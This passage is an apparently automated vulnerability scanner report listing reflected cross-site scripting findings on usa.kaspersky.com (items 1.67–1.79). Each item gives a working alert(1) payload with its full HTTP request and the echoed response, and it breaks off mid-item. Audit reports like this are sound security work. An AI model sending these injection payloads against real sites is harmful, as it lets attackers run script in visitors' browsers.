1.67. http://usa.kaspersky.com/about-us/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6a5e"-alert(1)-"5bd0805b351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145268"
Content-Type: text/html; charset=utf-8
Content-Length: 38988
Date: Sun, 04 Sep 2011 14:08:00 GMT
X-Varnish: 1163249336
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/index.html?d6a5e"-alert(1)-"5bd0805b351=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.68. http://usa.kaspersky.com/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78970"-alert(1)-"54a60fcb75b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.html78970"-alert(1)-"54a60fcb75b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:10:20 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145420"
Content-Type: text/html; charset=utf-8
Content-Length: 30557
Date: Sun, 04 Sep 2011 14:10:28 GMT
X-Varnish: 1163255153
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html78970"-alert(1)-"54a60fcb75b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.69. http://usa.kaspersky.com/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3593"><script>alert(1)</script>31e1b81b14a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.htmlf3593"><script>alert(1)</script>31e1b81b14a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145392"
Content-Type: text/html; charset=utf-8
Content-Length: 32124
Date: Sun, 04 Sep 2011 14:09:58 GMT
X-Varnish: 1163254250
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.htmlf3593"><script>alert(1)</script>31e1b81b14a" />
...[SNIP]...

1.70. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb7a"><script>alert(1)</script>b8beb20b2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:06:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145202"
Content-Type: text/html; charset=utf-8
Content-Length: 37512
Date: Sun, 04 Sep 2011 14:07:01 GMT
X-Varnish: 1163247051
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?1eb7a"><script>alert(1)</script>b8beb20b2dd=1" />
...[SNIP]...

1.71. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf166"-alert(1)-"c843acf5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.html?cf166"-alert(1)-"c843acf5a4=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145252"
Content-Type: text/html; charset=utf-8
Content-Length: 37350
Date: Sun, 04 Sep 2011 14:07:41 GMT
X-Varnish: 1163248685
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?cf166"-alert(1)-"c843acf5a4=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.72. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e8ad"-alert(1)-"90934118b45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules6e8ad"-alert(1)-"90934118b45/search/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:28:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139294"
Content-Type: text/html; charset=utf-8
Content-Length: 34734
Date: Sun, 04 Sep 2011 12:28:29 GMT
X-Varnish: 1163059887
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
es') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules6e8ad"-alert(1)-"90934118b45/search/search.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.73. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25232"><script>alert(1)</script>11c08334a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules25232"><script>alert(1)</script>11c08334a02/search/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:27:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139264"
Content-Type: text/html; charset=utf-8
Content-Length: 36526
Date: Sun, 04 Sep 2011 12:27:53 GMT
X-Varnish: 1163058817
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules25232"><script>alert(1)</script>11c08334a02/search/search.css?R" />
...[SNIP]...

1.74. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eae4"><script>alert(1)</script>52b4770be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search4eae4"><script>alert(1)</script>52b4770be9/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:29:53 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139393"
Content-Type: text/html; charset=utf-8
Content-Length: 32448
Date: Sun, 04 Sep 2011 12:30:01 GMT
X-Varnish: 1163062399
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search4eae4"><script>alert(1)</script>52b4770be9/search.css?R" />
...[SNIP]...

1.75. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee881"-alert(1)-"2890634d7c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/searchee881"-alert(1)-"2890634d7c4/search.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:30:24 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139424"
Content-Type: text/html; charset=utf-8
Content-Length: 30679
Date: Sun, 04 Sep 2011 12:30:35 GMT
X-Varnish: 1163063264
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchee881"-alert(1)-"2890634d7c4/search.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.76. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97cbc"><script>alert(1)</script>51d3a489a86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css97cbc"><script>alert(1)</script>51d3a489a86?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:32:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139530"
Content-Type: text/html; charset=utf-8
Content-Length: 32889
Date: Sun, 04 Sep 2011 12:32:33 GMT
X-Varnish: 1163065920
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.css97cbc"><script>alert(1)</script>51d3a489a86?R" />
...[SNIP]...

1.77. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccfd"-alert(1)-"a2f812229c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/search/search.csseccfd"-alert(1)-"a2f812229c6?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y; gpv_pageName=Homepage; s_nr=1315139049879-New

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:32:54 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139574"
Content-Type: text/html; charset=utf-8
Content-Length: 30678
Date: Sun, 04 Sep 2011 12:33:19 GMT
X-Varnish: 1163067352
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.csseccfd"-alert(1)-"a2f812229c6?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.78. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2b6"><script>alert(1)</script>377e8706d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node7f2b6"><script>alert(1)</script>377e8706d52/12354/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:06 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141686"
Content-Type: text/html; charset=utf-8
Content-Length: 30714
Date: Sun, 04 Sep 2011 13:08:13 GMT
X-Varnish: 1163125431
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node7f2b6"><script>alert(1)</script>377e8706d52/12354/lightbox2" />
...[SNIP]...

1.79. http://usa.kaspersky.com/node/12354/lightbox2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60fc8"-alert(1)-"39c8314a1f9f02d6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /node60fc8"-alert(1)-"39c8314a1f9f02d6a/12354/lightbox2?pure-pp=https%3A%2F%2Fstore.digitalriver.com%2Fstore%2Fkasperus%2Fen_US%2Fbuy%2FproductID.224976400&x=0&y=0 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
Origin: http://usa.kaspersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Kaspersky%252520PURE%252520Total%252520Security%252520%25257C%252520More%252520User%252520Options%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fall%25252Fthemes%25252Fzen%25252Fkaspersky_usatheme%25252Fimages%25252Fadd_to_cart_btn.gif%2526ot%253DIMAGE; gpv_pageName=Store%20%7C%20Kaspersky%20PURE%20Total%20Security%20%7C%20More%20User%20Options; s_nr=1315139121144-New

Response

